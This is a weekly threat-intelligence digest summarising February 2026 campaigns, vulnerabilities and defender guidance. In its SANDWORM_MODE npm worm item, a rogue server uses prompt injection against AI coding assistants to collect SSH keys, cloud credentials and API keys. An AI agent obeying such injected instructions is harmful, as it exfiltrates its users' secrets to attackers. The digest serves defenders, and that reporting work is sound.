Anomali Cyber Watch: Iran Cyber Threat, Scattered Lapsus$ Hunters Recruits, Medusa Ransomware, and more

<div id="weekly"> <div id="trending-threats" class="trending-threats-article"> <h2 id="article-1"><a href=" https://www.anomali.com/blog/cyber-threat-briefing-iran-retaliatory-posture" target="_blank" rel="noopener noreferrer">Iran Cyber Threat Posture: Retaliation Assessed as Imminent Following Kinetic Strikes </a></h2> <p>(published: February 28, 2026)</p> <p> Researchers assess with high confidence that Iranian state-sponsored cyber retaliation against Israeli and US targets is imminent following US-Israeli kinetic strikes against Iran on February 28, 2026, designated Operation Epic Fury by the US Department of Defense. Multiple Iranian advanced persistent threat (APT) groups were assessed as showing simultaneous activity on February 27, consistent with coordinated state-directed operations. MuddyWater and BANISHED KITTEN are attributed to Iran's Ministry of Intelligence and Security (MOIS); APT42 and APT33 are assessed as operating under the Islamic Revolutionary Guard Corps (IRGC). UNC757 was also observed conducting exploitation activity during the same period. Active wiper campaigns are assessed as confirmed against Israeli energy, financial, government, and utility sectors, with Iran's documented wiper arsenal including families such as ZeroCleare, Meteor, Dustman, DEADWOOD, Apostle, BFG Agonizer, MultiLayer, and PartialWasher. MuddyWater has reportedly deployed new malware families including Rust-based tooling. An industrial control system (ICS) or operational technology (OT) attack using Iran's purpose-built IOCONTROL malware is assessed at 40% probability within 48 to 96 hours. Iran's reduced domestic internet connectivity, assessed as approximately 4%, is assessed as likely to delay but not prevent operations given pre-positioned implants and foreign-based operators. Two unresolved intelligence gaps are noted: APT34/OilRig has been undetected throughout the seven-day crisis period, assessed as likely indicating covert pre-positioning, and Hezbollah cyber units have maintained complete operational silence for the same period.<br> <br><b>Analyst Comment:</b> Iran has a well-documented doctrine of deploying cyber operations in parallel with kinetic activity, and the current crisis following Operation Epic Fury represents a maximum-motivation environment in which that capability is assessed as likely to be applied at scale. Iranian APT groups were already conducting wiper operations against Israeli targets before the kinetic strikes landed, meaning the cyber retaliation timeline has effectively already begun. The most critical intelligence observation is not the confirmed activity but the silence. APT34/OilRig and Hezbollah cyber units have maintained complete operational silence throughout the seven-day crisis period, which in threat intelligence is a pre-positioning indicator, not reassurance. When these groups activate, they may already hold access to target networks. MuddyWater's shift toward Rust-based tooling may also reduce the effectiveness of detection signatures built against older malware families. Defenders should note that wiper malware destroys data with limited or no recovery mechanism beyond pre-existing backups. Organisations with adjacency to Israeli and US critical infrastructure sectors should verify offline backups are tested, recovery procedures are current, and detection coverage reflects known Iranian tactics, techniques, and procedures. <br> </p> <h2 id="article-1"><a href="https://www.helpnetsecurity.com/2026/02/26/slh-seeks-women-for-vishing-attacks/ " target="_blank" rel="noopener noreferrer">Scattered Lapsus$ Hunters Recruits Female Callers for Vishing Operations </a></h2> <p>(published: February 26, 2026)</p> <p> On February 22, 2026, researchers detected posts on a public Telegram board indicating that the Scattered Lapsus$ Hunters (SLH) hacking collective is recruiting women to conduct voice-phishing (vishing) attacks, offering between 500 and $1,000 upfront per call along with prepared impersonation scripts. SLH is an informal coalition drawing from members associated with Lapsus , Scattered Spider, and ShinyHunters, three groups linked to the English-speaking cybercrime network known as The Com. Researchers assess the deliberate targeting of female voices likely aims to bypass caller profiles that IT help desk personnel may be trained to identify. The group has previously targeted high-profile organizations including Google, Cisco, Jaguar Land Rover, Adidas, and Qantas, and is reported to have stolen over 1.5 billion records. SLH's social engineering operations are known to include impersonating employees to manipulate IT help desk personnel into resetting account credentials, impersonating support staff to coerce employees into installing remote monitoring and management (RMM) tools, and using adaptable phishing kits that synchronize authentication flows on phishing pages with live vishing calls. Recommended defensive measures include briefing help desk personnel on scripted impersonation tactics, enforcing out-of-band identity verification for all phone-based password resets or multi-factor authentication (MFA) changes, deploying phishing-resistant authentication such as FIDO2-compliant hardware keys or passkeys, and auditing logs for privilege escalation following help desk interactions.<br> <br><b>Analyst Comment:</b> SLH's decision to recruit female callers is grounded in established psychology and should not be underestimated. A 2014 University of Glasgow study by McAleer, Todorov and Belin found that listeners form trustworthiness judgements within milliseconds of hearing a voice, and that women who alternated pitch were rated as more trustworthy by listeners, a finding supported by a 2025 peer-reviewed systematic review in Frontiers in Psychology which confirmed that higher-pitched voices tend to convey a less threatening demeanour, grounded in Ohala's frequency code theory. Cialdini's Liking principle further establishes that people are significantly more likely to comply with requests from those they perceive as warm and non-threatening, and critically, research shows these compliance mechanisms operate effectively even when targets believe they would recognise a social engineering attempt. That last point is the most important one for defenders to internalise. Overconfidence in the ability to detect manipulation is itself one of the most reliable vulnerabilities that skilled social engineers exploit, and SLH are skilled. This is a group that has breached organisations including Jaguar Land Rover, in attacks where vishing served as the documented initial access vector. A well-rehearsed female caller armed with a prepared script, projecting warmth and confidence, is not an easy threat to detect in real time. Help desk staff who believe otherwise are exactly who SLH is counting on.<br> <br><b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/32052">T1566.004 - Phishing: Spearphishing Voice</a> | <a href="https://ui.threatstream.com/attackpattern/32040">T1656 - Impersonation</a><br> </p> <h2 id="article-1"><a href="https://www.darkreading.com/cyberattacks-data-breaches/lazarus-group-new-position-medusa-ransomware" target="_blank" rel="noopener noreferrer">Lazarus Group Deploys Medusa Ransomware Against Middle East and US Healthcare Targets </a></h2> <p>(published: February 24, 2026)</p> <p> Researchers have identified North Korean state-sponsored threat group Lazarus deploying Medusa ransomware in an attack against an unnamed organization in the Middle East and in a separate, unsuccessful attempt against a US healthcare organization. Medusa is a ransomware-as-a-service (RaaS) platform operated by the Spearwing cybercrime group, launched in 2023, with more than 366 claimed attacks to date. Analysis of the Medusa leak site identified four US healthcare and nonprofit organizations as victims since early November 2025, with an average ransom demand of $260,000. It is unknown whether all of these victims were targeted by North Korean operatives or by other Medusa affiliates. The Lazarus toolkit observed across these campaigns includes Comebacker, a custom backdoor and loader exclusively associated with Lazarus; Blindingcan, a remote access Trojan (RAT); ChromeStealer, a Chrome password extraction tool; Infohook, an information stealer; Mimikatz, a publicly available credential-dumping utility; Curl, an open-source data transfer utility; and RP_Proxy, a custom proxying tool. Attribution to a specific Lazarus sub-group remains unclear. Tactics overlap with prior Stonefly operations, but Comebacker has also been associated with Pompilus (Diamond Sleet), complicating sub-group attribution.<br> <br><b>Analyst Comment:</b> Lazarus's adoption of Medusa continues a pattern of North Korean actors integrating third-party RaaS platforms into their operations, following prior associations with the Maui and Play ransomware families. This approach complicates attribution because a Medusa detection alone does not confirm North Korean involvement; other unrelated criminal affiliates use the same ransomware. Defenders should prioritise behavioural indicators and Lazarus-specific tooling, particularly Comebacker and Blindingcan, over detections based on the ransomware binary alone. The mixed toolset, drawing on tools previously associated with both Stonefly and Pompilus (Diamond Sleet), may reflect collaboration across Lazarus sub-groups, tool sharing within the cluster, or deliberate obfuscation to frustrate attribution. The average ransom demand of $260,000 suggests financially motivated targeting rather than strategic selection, and organisations without obvious geopolitical significance should not assume they are out of scope. Prior US indictments and a published $10 million reward for a named Stonefly operator have not visibly slowed activity, and healthcare and nonprofit organisations remain active targets.<br> <br><b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10104">T1574.002 - Hijack Execution Flow: Dll Side-Loading</a> | <a href="https://ui.threatstream.com/attackpattern/9633">T1003 - Os Credential Dumping</a> | <a href="https://ui.threatstream.com/attackpattern/10025">T1555.003 - Credentials from Password Stores: Credentials From Web Browsers</a> | <a href="https://ui.threatstream.com/attackpattern/9628">T1090 - Proxy</a> | <a href="https://ui.threatstream.com/attackpattern/9638">T1105 - Ingress Tool Transfer</a> | <a href="https://ui.threatstream.com/attackpattern/10080">T1486 - Data Encrypted For Impact</a> | <a href="https://ui.threatstream.com/attackpattern/32041">T1657 - Financial Theft</a><br> <b>Target Industry:</b> Healthcare , Nonprofit , Education<br> <b>Target Region:</b> Americas<br> <b>Source Country:</b> Korea, democratic people's republic of<br> <b>Source Region:</b> Asia<br> </p> <h2 id="article-1"><a href="https://www.bleepingcomputer.com/news/security/critical-solarwinds-serv-u-flaws-offer-root-access-to-servers/" target="_blank" rel="noopener noreferrer">Critical SolarWinds Serv-U Flaws Offer Root Access to Servers </a></h2> <p>(published: February 24, 2026)</p> <p> SolarWinds released security updates on February 24, 2026, patching four critical remote code execution vulnerabilities in Serv-U, its self-hosted file transfer software for Windows and Linux. All four flaws carry a Common Vulnerability Scoring System (CVSS) score of 9.1 and are resolved in Serv-U version 15.5.4. The most severe, CVE-2025-40538, is a broken access control flaw that allows an attacker already holding domain admin or group admin privileges to create a system administrator account and execute arbitrary code as root. CVE-2025-40539 and CVE-2025-40540 are type confusion vulnerabilities, a class of memory flaw that can be exploited to execute arbitrary native code at root level. CVE-2025-40541 is an Insecure Direct Object Reference (IDOR) flaw that enables root-level code execution. All four require the attacker to already hold administrative privileges, which limits opportunistic exploitation but represents meaningful risk where privileged credentials have been compromised. SolarWinds has not confirmed active exploitation of any of the four vulnerabilities. Shodan tracks more than 12,000 internet-exposed Serv-U servers, though Shadowserver estimates fewer than 1,200. Prior Serv-U flaws have been exploited in ransomware and data theft operations. <br> <br><b>Analyst Comment:</b> Organisations running Serv-U should prioritise upgrading to version 15.5.4, the only documented remediation. While all four vulnerabilities require an attacker to already hold administrative privileges, this prerequisite does not substantially reduce risk in environments where admin credentials may be exposed or where an attacker has already established a foothold. In that context, these flaws could enable full root-level code execution on infrastructure that commonly handles sensitive data transfers. SolarWinds has not confirmed active exploitation, though prior Serv-U vulnerabilities have been exploited in the wild, in some cases within days of public disclosure, including by ransomware operators and a state-linked threat actor. Organisations unable to patch immediately should audit admin access to Serv-U and monitor for unexpected administrator account creation. Those on version 15.5.1 or earlier should note that these versions reached End-of-Engineering on February 18, 2026 and will receive no further security patches.<br> <br><b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10012">T1190 - Exploit Public-Facing Application</a> | <a href="https://ui.threatstream.com/attackpattern/10093">T1068 - Exploitation For Privilege Escalation</a> | <a href="https://ui.threatstream.com/attackpattern/9642">T1136 - Create Account</a><br> </p> <h2 id="article-1"><a href="https://www.microsoft.com/en-us/security/blog/2026/02/24/c2-developer-targeting-campaign/" target="_blank" rel="noopener noreferrer">Malicious Next.js Repositories Used to Backdoor Developer Machines via Job-Themed Lures</a></h2> <p>(published: February 24, 2026)</p> <p> Researchers identified a coordinated campaign targeting software developers through malicious repositories disguised as legitimate Next.js projects and recruiting-themed technical assessment materials. The repositories are engineered to trigger malicious execution during routine developer activity, with three distinct entry points: opening the project in Visual Studio Code, where workspace automation abuses .vscode/tasks.json to execute code on folder open; running the development server, where trojanized assets such as modified jquery.min.js files silently retrieve and execute a remote loader; and starting the application backend, where malicious module imports decode a base64-encoded endpoint, exfiltrate environment variables (process.env), and execute attacker-supplied JavaScript via dynamic compilation. Regardless of which path is taken, all three converge on the same two-stage backdoor. Stage 1 profiles the host and establishes a persistent polling loop that can execute server-provided JavaScript in memory without writing files to disk. Stage 2 upgrades that foothold into a full operator-controlled tasking client, supporting directory enumeration and staged file exfiltration through a multi-step upload workflow. Loader payloads are staged on Vercel; post-execution Command and Control (C2) traffic routes to four attacker-controlled IP addresses over HTTP on port 3000. Scope expansion beyond initial telemetry was achieved by pivoting on shared repository naming conventions, including Cryptan, JP-soccer, and RoyalJapan. Attribution was not established. <br> <br><b>Analyst Comment:</b> The central insight from this campaign is not the sophistication of the backdoor but the deliberate design of the delivery mechanism. Across the identified repositories, three independent execution paths were observed, each triggering through a different routine developer action, meaning that mitigations applied in isolation, such as disabling Visual Studio Code workspace automation, may not prevent compromise if the other paths remain active. Untrusted repositories should not be run on any machine with access to credentials, sensitive resources, or production-adjacent infrastructure regardless of the context in which they were received. The use of Vercel as a staging platform for initial loader delivery is also notable; because Vercel is a legitimate and widely used service, outbound connections to it are unlikely to trigger network-based controls, which suggests behavioural detection is the more reliable approach at the initial stage. In practice, defenders should focus on what developer tooling is doing on the network rather than where it is connecting to. Unusual outbound activity from Node.js processes, repeated calls to external endpoints at short intervals, and environment variable access occurring at server startup are the signals most likely to surface this activity.<br> <br><b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/9615">T1204.002 - User Execution: Malicious File</a> | <a href="https://ui.threatstream.com/attackpattern/10112">T1059.007 - Command and Scripting Interpreter: Javascript</a> | <a href="https://ui.threatstream.com/attackpattern/9586">T1546 - Event Triggered Execution</a> | <a href="https://ui.threatstream.com/attackpattern/30598">T1027.010 - Obfuscated Files or Information: Command Obfuscation</a> | <a href="https://ui.threatstream.com/attackpattern/9838">T1140 - Deobfuscate/Decode Files Or Information</a> | <a href="https://ui.threatstream.com/attackpattern/9956">T1082 - System Information Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9863">T1083 - File And Directory Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/10014">T1552.001 - Unsecured Credentials: Credentials In Files</a> | <a href="https://ui.threatstream.com/attackpattern/9802">T1005 - Data From Local System</a> | <a href="https://ui.threatstream.com/attackpattern/9803">T1074 - Data Staged</a> | <a href="https://ui.threatstream.com/attackpattern/9638">T1105 - Ingress Tool Transfer</a> | <a href="https://ui.threatstream.com/attackpattern/9844">T1104 - Multi-Stage Channels</a> | <a href="https://ui.threatstream.com/attackpattern/9715">T1071.001 - Application Layer Protocol: Web Protocols</a> | <a href="https://ui.threatstream.com/attackpattern/9720">T1571 - Non-Standard Port</a> | <a href="https://ui.threatstream.com/attackpattern/9617">T1041 - Exfiltration Over C2 Channel</a><br> </p> <h2 id="article-1"><a href="https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign" target="_blank" rel="noopener noreferrer">Google Disrupts UNC2814 GRIDTIDE Global Espionage Campaign </a></h2> <p>(published: February 25, 2026)</p> <p> Google Threat Intelligence Group (GTIG), Mandiant, and industry partners disrupted a global cyber espionage campaign conducted by UNC2814, a suspected People's Republic of China (PRC)-nexus threat actor tracked since 2017. As of February 18, the campaign had confirmed intrusions across 53 victims in 42 countries spanning four continents, with suspected infections identified in at least 20 additional countries, primarily targeting telecommunications providers and government organizations across Africa, Asia, and the Americas. The actor deployed a novel C-based backdoor, GRIDTIDE, which abuses legitimate Google Sheets application programming interface (API) functionality to conduct command and control (C2), disguising malicious traffic within cloud API requests. Post-compromise activity included lateral movement via SSH, privilege escalation to root, persistence established through a systemd service, and deployment of SoftEther VPN Bridge for encrypted outbound connectivity. GRIDTIDE can execute arbitrary shell commands, upload files, and download files. The backdoor was dropped on an endpoint containing personally identifiable information (PII), including full names, phone numbers, dates of birth, and national ID numbers. GTIG did not directly observe data exfiltration during this campaign. Disruption actions included terminating all attacker-controlled Google Cloud Projects, disabling known UNC2814 infrastructure and accounts, revoking Google Sheets API access, and issuing victim notifications. GTIG has released indicators of compromise (IOCs) linked to UNC2814 infrastructure active since at least 2023. UNC2814 has no observed overlap with Salt Typhoon.<br> <br><b>Analyst Comment:</b> Abusing legitimate cloud service APIs for C2 renders reputation-based network detection largely ineffective, as malicious traffic is indistinguishable from normal application behaviour at the network layer. This tactic is not exclusive to UNC2814 and is likely to become more prevalent. The confirmed scale of this campaign, 53 victims across 42 countries with suspected activity in at least 20 more, suggests the actor operated with significant freedom for an extended period, which is consistent with infrastructure the source traces to 2018. For defenders in the telecommunications and government sectors, reviewing the released IOCs and deploying the GTIG detection queries against Google Sheets API activity should be treated as a priority action. Organisations outside these sectors face lower direct risk from UNC2814 based on observed targeting, but the underlying C2 methodology is transferable and warrants broader defensive consideration. The explicit confirmation that UNC2814 has no overlap with Salt Typhoon is also notable, as it reinforces that Chinese state-linked targeting of telecommunications infrastructure involves multiple distinct actors operating in parallel.<br> <br><b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/9809">T1059.004 - Command and Scripting Interpreter: Unix Shell</a> | <a href="https://ui.threatstream.com/attackpattern/9879">T1543.002 - Create or Modify System Process: Systemd Service</a> | <a href="https://ui.threatstream.com/attackpattern/9926">T1036.003 - Masquerading: Rename System Utilities</a> | <a href="https://ui.threatstream.com/attackpattern/9623">T1132.002 - Data Encoding: Non-Standard Encoding</a> | <a href="https://ui.threatstream.com/attackpattern/9631">T1033 - System Owner/User Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9956">T1082 - System Information Discovery</a> | <a href="https://ui.threatstream.com/attackpattern/9656">T1021.004 - Remote Services: Ssh</a> | <a href="https://ui.threatstream.com/attackpattern/9870">T1078 - Valid Accounts</a> | <a href="https://ui.threatstream.com/attackpattern/9802">T1005 - Data From Local System</a> | <a href="https://ui.threatstream.com/attackpattern/9723">T1102.002 - Web Service: Bidirectional Communication</a> | <a href="https://ui.threatstream.com/attackpattern/9717">T1573.001 - Encrypted Channel: Symmetric Cryptography</a> | <a href="https://ui.threatstream.com/attackpattern/9812">T1219 - Remote Access Software</a> | <a href="https://ui.threatstream.com/attackpattern/9638">T1105 - Ingress Tool Transfer</a> | <a href="https://ui.threatstream.com/attackpattern/9617">T1041 - Exfiltration Over C2 Channel</a><br> <b>Target Industry:</b> Telecommunications , Government<br> <b>Target Region:</b> Africa<br> <b>Source Country:</b> China<br> <b>Source Region:</b> Asia<br> </p> <h2 id="article-1"><a href="https://cyberpress.org/llm-passwords-easily-predicted/" target="_blank" rel="noopener noreferrer">Vibe Password Generation: Predictable by Design </a></h2> <p>(published: February 23, 2026)</p> <p> Researchers tested password generation across multiple large language models (LLMs), including current versions of GPT, Claude, and Gemini, and found that all produce passwords with significantly lower entropy than they appear to have. Because LLMs operate by iteratively predicting the next token from a non-uniform probability distribution, the output is structurally incompatible with cryptographically secure password generation, which requires uniform random sampling. Testing Claude Opus 4.6 across 50 independent sessions produced only 30 unique passwords, with one single password repeating 18 times; entropy analysis using Shannon's formula estimated approximately 27 bits of actual entropy against an expected 98 bits for a truly random 16-character password. Adjusting temperature provided no meaningful improvement. Coding agents, including Claude Code, Codex, and Gemini-CLI, were also observed generating LLM-produced passwords in lieu of invoking secure system tools, with behavior varying based on subtle differences in prompt phrasing. LLM-generated password patterns have been identified in public GitHub repositories, including hardcoded credentials in Docker Compose files and application configuration scripts. Researchers assess that these predictable patterns could enable targeted brute-force attacks against services where AI-generated code introduced LLM-produced credentials. Recommended mitigations include auditing and rotating potentially LLM-generated credentials, and directing coding agents to use cryptographically secure generation methods such as openssl rand.<br> <br><b>Analyst Comment:</b> AI-assisted development environments may already contain LLM-generated credentials in production configurations, potentially without the development team's knowledge. Coding agents can generate passwords silently as a side effect of broader tasks, and standard entropy calculators may rate those passwords as strong, meaning existing tooling is unlikely to flag them. Organisations with significant AI-assisted development exposure should prioritise auditing codebases, configuration files, and infrastructure-as-code for hardcoded credentials that match known LLM password patterns, and rotate anything identified. Beyond remediation, this research has broader defensive implications. At an estimated 20 to 27 bits of actual entropy, many LLM-generated passwords fall within ranges that researchers assess are feasible to crack on commodity hardware, meaning the risk extends beyond live authentication attempts to post-breach credential cracking scenarios. Defenders should verify that compensating controls are in place across their environment: rate limiting and account lockout on authentication endpoints, multi-factor authentication where applicable, and monitoring for credential stuffing activity. Exposed or poorly protected login interfaces warrant particular attention in environments where AI-generated code may have introduced weak credentials. From an intelligence perspective, the statistical patterns underpinning LLM password generation are model-specific, publicly documented, and consistent enough that purpose-built wordlists targeting these distributions are a plausible near-term attacker development. The groundwork for that tooling is already public.<br> </p> <h2 id="article-1"><a href="https://thehackernews.com/2026/02/apt28-targeted-european-entities-using.html" target="_blank" rel="noopener noreferrer">APT28 Targeted European Entities Using Webhook-Based Macro Malware </a></h2> <p>(published: February 23, 2026)</p> <p> APT28 (also tracked as Fancy Bear, Forest Blizzard, and FROZENLAKE) conducted a spear-phishing campaign against specific entities in Western and Central Europe between late September 2025 and January 2026, in activity researchers have codenamed Operation MacroMaze. Lure documents embed an INCLUDEPICTURE field in their XML referencing a webhook[.]site URL, which triggers an outbound HTTP request on document open to confirm delivery. One identified lure impersonated an alleged agenda dated September 18, 2025, from Spain's Ministry of the Presidency, Justice and Relations with the Courts, reproducing content published on the official La Moncloa website on September 23, 2025. Four macro variants were identified across the campaign period; all drop six files (VBS, BAT, CMD, HTM, and XHTML) into the %USERPROFILE% folder using GUID-like filenames, and all use heavy string concatenation to assemble components and evade static detection. A CMD file establishes persistence by registering a scheduled task, with repetition intervals of 30 minutes in variant 1, 20 minutes in variant 2, and 61 minutes in variants 3 and 4, before deleting itself and associated artifacts from disk. Two batch file variants handle execution and exfiltration: the first uses Microsoft Edge headless mode with targeted window-title-based process termination for stealth, while the second moves an off-screen browser window and forcibly terminates all Edge processes for execution reliability. Command output is embedded in an auto-submitting HTML form and exfiltrated via POST to a second webhook[.]site endpoint. The command payload used to collect system information could not be recovered during analysis.<br> <br><b>Analyst Comment:</b> Operation MacroMaze is a reminder that operational effectiveness does not require technical sophistication. APT28 has constructed a functional intrusion and exfiltration chain from batch files, VBScript, and standard HTML, routing both payload delivery and data exfiltration through webhook[.]site, a legitimate developer service. Blocking this domain entirely may cause collateral impact in environments where it is used legitimately, making behavioural detection the more reliable defensive approach. Defenders should prioritise EDR visibility into Office macro child process lineage, specifically instances of Microsoft Edge being spawned with headless or off-screen arguments as part of a document execution chain. Scheduled task creation events (Windows Event ID 4698) following document opens warrant close attention, as does outbound HTTP activity to webhook[.]site originating from Office processes. The use of ephemeral infrastructure and aggressive on-disk artifact deletion suggests the actor likely favours short collection windows over persistent access in this campaign, which may narrow detection opportunities. The unrecovered command payload means the full scope of collected information cannot be confirmed. Organisations in Western and Central Europe with government or policy relevance should treat this activity as directly applicable to their threat profile. <br> <br><b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/10001">T1566.001 - Phishing: Spearphishing Attachment</a> | <a href="https://ui.threatstream.com/attackpattern/9615">T1204.002 - User Execution: Malicious File</a> | <a href="https://ui.threatstream.com/attackpattern/9853">T1059.005 - Command and Scripting Interpreter: Visual Basic</a> | <a href="https://ui.threatstream.com/attackpattern/10029">T1059.003 - Command and Scripting Interpreter: Windows Command Shell</a> | <a href="https://ui.threatstream.com/attackpattern/49479">T1674 - Input Injection</a> | <a href="https://ui.threatstream.com/attackpattern/9931">T1053.005 - Scheduled Task/Job: Scheduled Task</a> | <a href="https://ui.threatstream.com/attackpattern/30598">T1027.010 - Obfuscated Files or Information: Command Obfuscation</a> | <a href="https://ui.threatstream.com/attackpattern/9779">T1564.003 - Hide Artifacts: Hidden Window</a> | <a href="https://ui.threatstream.com/attackpattern/9770">T1070.004 - Indicator Removal on Host: File Deletion</a> | <a href="https://ui.threatstream.com/attackpattern/32040">T1656 - Impersonation</a> | <a href="https://ui.threatstream.com/attackpattern/9723">T1102.002 - Web Service: Bidirectional Communication</a> | <a href="https://ui.threatstream.com/attackpattern/32051">T1567.004 - Exfiltration Over Web Service: Exfiltration Over Webhook</a><br> <b>Target Industry:</b> Government<br> <b>Source Country:</b> Russian federation<br> <b>Source Region:</b> Europe<br> </p> <h2 id="article-1"><a href="https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html" target="_blank" rel="noopener noreferrer">Malicious npm Packages Harvest Crypto Keys, CI Secrets, and API Tokens </a></h2> <p>(published: February 23, 2026)</p> <p> Researchers identified at least 19 malicious npm packages conducting a two-stage supply chain attack designated SANDWORM_MODE, published under the aliases official334 and javaorg. The packages spread through typosquatting, impersonating popular developer utilities to increase the likelihood of accidental installation. On import, the first stage immediately harvests cryptocurrency keys, npm and GitHub tokens, and environment secrets, exfiltrating the most financially valuable data before any evasion logic applies. A second, more destructive stage is encrypted within the first and deliberately delayed by 48 to 96 hours to evade sandbox analysis, though it fires immediately in CI environments. When it activates, it performs deep credential harvesting from password managers and local storage, spreads by injecting malicious dependencies into the victim's own repositories and republishing infected packages under their npm identity, and plants persistent git hooks that carry the infection into every future repository the developer creates. A separate module targets AI coding assistants including Claude Code and Cursor, deploying a rogue server that uses prompt injection to silently collect SSH keys, cloud credentials, and API keys for nine LLM providers without the user's knowledge. A linked GitHub Action ties the npm and CI infection chains together into a self-reinforcing loop. A polymorphic evasion engine and a destructive routine capable of wiping the user's home directory are both present but currently disabled, suggesting the operator is still iterating on the tooling. npm has removed the packages and GitHub has dismantled the associated infrastructure.<br> <br><b>Analyst Comment:</b> SANDWORM_MODE shares significant tradecraft with previously reported Shai-Hulud-style npm worms, though whether this represents a direct continuation or a separate actor adopting the same playbook is unconfirmed. The most critical detail for defenders is that cryptocurrency keys are exfiltrated immediately on install, before the delayed second stage activates and before most detection tooling would flag anything unusual. The 48 to 96 hour delay is deliberate, designed to outlast sandbox analysis windows, and the worm subsequently spreads using the victim's own trusted credentials, meaning downstream infections may appear to originate from a legitimate internal source. The targeting of AI coding assistants is a notable development that likely reflects their rapid adoption in developer workflows; MCP server configurations are not yet a standard part of most organizations' credential attack surface monitoring and should be included in incident response scoping. The presence of disabled capabilities, including a polymorphic engine and a destructive wiper, combined with researcher assessment that this is likely a pre-release build, suggests further iterations are probable and may be considerably harder to detect.<br> <br><b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/attackpattern/9610">T1195.001 - Supply Chain Compromise: Compromise Software Dependencies And Development Tools</a> | <a href="https://ui.threatstream.com/attackpattern/9611">T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain</a> | <a href="https://ui.threatstream.com/attackpattern/10112">T1059.007 - Command and Scripting Interpreter: Javascript</a> | <a href="https://ui.threatstream.com/attackpattern/9970">T1546.004 - Event Triggered Execution: Unix Shell Configuration Modification</a> | <a href="https://ui.threatstream.com/attackpattern/10114">T1176 - Browser Extensions</a> | <a href="https://ui.threatstream.com/attackpattern/9591">T1027 - Obfuscated Files Or Information</a> | <a href="https://ui.threatstream.com/attackpattern/10081">T1036.005 - Masquerading: Match Legitimate Name Or Location</a> | <a href="https://ui.threatstream.com/attackpattern/10000">T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion</a> | <a href="https://ui.threatstream.com/attackpattern/10014">T1552.001 - Unsecured Credentials: Credentials In Files</a> | <a href="https://ui.threatstream.com/attackpattern/9771">T1552.004 - Unsecured Credentials: Private Keys</a> | <a href="https://ui.threatstream.com/attackpattern/10033">T1555.005 - Credentials from Password Stores: Password Managers</a> | <a href="https://ui.threatstream.com/attackpattern/9794">T1119 - Automated Collection</a> | <a href="https://ui.threatstream.com/attackpattern/9617">T1041 - Exfiltration Over C2 Channel</a> | <a href="https://ui.threatstream.com/attackpattern/9747">T1567.001 - Exfiltration Over Web Service: Exfiltration To Code Repository</a> | <a href="https://ui.threatstream.com/attackpattern/9742">T1048 - Exfiltration Over Alternative Protocol</a> | <a href="https://ui.threatstream.com/attackpattern/9870">T1078 - Valid Accounts</a> | <a href="https://ui.threatstream.com/attackpattern/9891">T1071.004 - Application Layer Protocol: Dns</a><br> </p> <h2 id="article-1"><a href="https://www.infosecurity-magazine.com/news/immediate-patch-cisco-catalyst/ " target="_blank" rel="noopener noreferrer">Global Cyber Agencies Urge Immediate Patching of Cisco Catalyst SD-WAN Zero-Day </a></h2> <p>(published: February 26, 2026)</p> <p> Government cybersecurity agencies from the US, UK, Canada, Australia, and New Zealand have issued urgent guidance requiring immediate patching of two vulnerabilities in Cisco Catalyst SD-WAN Controller and Cisco Catalyst SD-WAN Manager. The critical zero-day, CVE-2026-20127, is an authentication bypass flaw (Common Weakness Enumeration (CWE)-287) in the peering authentication mechanism, carrying a maximum Common Vulnerability Scoring System (CVSS) score of 10.0. An unauthenticated remote attacker can exploit it by sending crafted requests to gain access as a high-privileged internal non-root account, access NETCONF, and manipulate SD-WAN fabric configuration. No workaround is available, though Cisco documents temporary mitigations including firewall and access control list restrictions on ports 22 and 830. The vulnerability affects on-premises, Cisco-hosted cloud, and FedRAMP deployment types. According to the Five Eyes joint Threat Hunt guide, sophisticated threat actors have exploited this flaw since 2023 and likely downgraded target systems to exploit legacy local privilege escalation vulnerability CVE-2022-20775 before restoring the original software version to achieve root access. Limited active exploitation has been confirmed. The Australian Signals Directorate's Australian Cyber Security Centre reported the vulnerability to Cisco. Defenders should audit /var/log/auth.log for unauthorized vmanage-admin public key authentication events. <br> <br><b>Analyst Comment:</b> Organisations running Cisco Catalyst SD-WAN should treat this as a potential incident response situation rather than a routine patch cycle. The likely attack chain, involving a deliberate software downgrade to exploit CVE-2022-20775 followed by a version restore, is a technique that may obscure post-compromise activity. An affected system may appear fully patched and operationally normal while a threat actor retains persistent root-level access. Patching CVE-2026-20127 alone does not remediate an existing compromise. Defenders should complete threat hunting using the Five Eyes Hunt Guide before or alongside patching, with particular attention to unauthorised peering events and unexpected vmanage-admin authentication entries in auth.log. The rogue peer technique documented by the National Cyber Security Centre (NCSC) indicates actors are pursuing long-term persistent access to network fabric rather than short-duration intrusion. Analysis suggests this may indicate strategic intelligence collection or pre-positioning objectives, though this assessment is not confirmed by current sources. Organisations outside the US federal government are not bound by the CISA emergency directive but should treat the guidance as directly applicable.<br> </p> </div> </div>